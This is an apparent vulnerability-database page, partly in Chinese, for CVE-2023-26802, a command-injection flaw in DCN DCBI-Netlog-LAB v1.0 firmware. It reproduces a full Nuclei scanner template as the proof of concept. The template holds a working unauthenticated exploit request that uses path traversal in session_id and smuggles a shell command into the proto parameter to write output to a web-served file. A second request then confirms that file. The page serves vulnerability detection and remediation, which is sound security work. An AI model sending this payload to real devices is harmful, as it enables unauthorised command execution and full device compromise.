CVE-2023-26802: DCBI-Netlog-LAB v1.0 - Command Injection

日期: 2025-08-01 | 影响软件: DCBI-Netlog-LAB | POC: 已公开

漏洞描述

An issue in the component /network_config/nsg_masq.cgi of DCN (Digital China Networks) DCBI-Netlog-LAB v1.0 allows attackers to bypass authentication and execute arbitrary commands via a crafted request.

PoC代码[已公开]

id: CVE-2023-26802

info:
  name: DCBI-Netlog-LAB v1.0 - Command Injection
  author: pussycat0x
  severity: critical
  description: |
    An issue in the component /network_config/nsg_masq.cgi of DCN (Digital China Networks) DCBI-Netlog-LAB v1.0 allows attackers to bypass authentication and execute arbitrary commands via a crafted request.
  impact: |
    Unauthenticated attackers can bypass authentication and execute arbitrary OS commands on the DCN DCBI-Netlog-LAB device, leading to complete device compromise and potential network infiltration.
  remediation: |
    Upgrade to the latest firmware version from DCN that addresses this command injection vulnerability, or apply vendor-provided security patches.
  reference:
    - https://web.archive.org/web/20230605051153/https://github.com/winmt/my-vuls/tree/main/DCN%20DCBI-Netlog-LAB
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-26802
    cwe-id: CWE-22
    epss-score: 0.84594
    epss-percentile: 0.99298
    cpe: cpe:2.3:o:dcnglobal:dcbi-netlog-lab_firmware:1.0:*:*:*:*:*:*:*
  metadata:
    vendor: dcnglobal
    product: dcbi-netlog-lab_firmware
  tags: cve,cve2023,rce,unauth,netlog,vkev,vuln

variables:
  file_name: "{{rand_text_alpha(4)}}.html"

http:
  - raw:
      - |
        GET /cgi-bin/network_config/nsg_masq.cgi?user_name=admin&session_id=../&lang=zh_CN.UTF-8&act=2&proto=;ls>/usr/local/lyx/lyxcenter/web/{{file_name}}; HTTP/1.1
        Host: {{Hostname}}
        DNT: 1
        X-Forwarded-For: 8.8.8.8

      - |
        GET /{{file_name}}  HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        DNT: 1
        X-Forwarded-For: 8.8.8.8

    matchers-condition: and
    matchers:
      - type: word
        part: body_2
        words:
          - "nsg_bridge.cgi"
          - "nsg_dhcpactiveip.cgi"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a004730450220799f4e6920c327b304047b9e48c4800ef31f8f0df9dd675800370bc9af6f93ee022100a44bfaf85d6e4cc2cb20a20c2624146c856b0d17834fd2313a467c74591249a3:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2023/CVE-2023-26802.yaml

相关漏洞推荐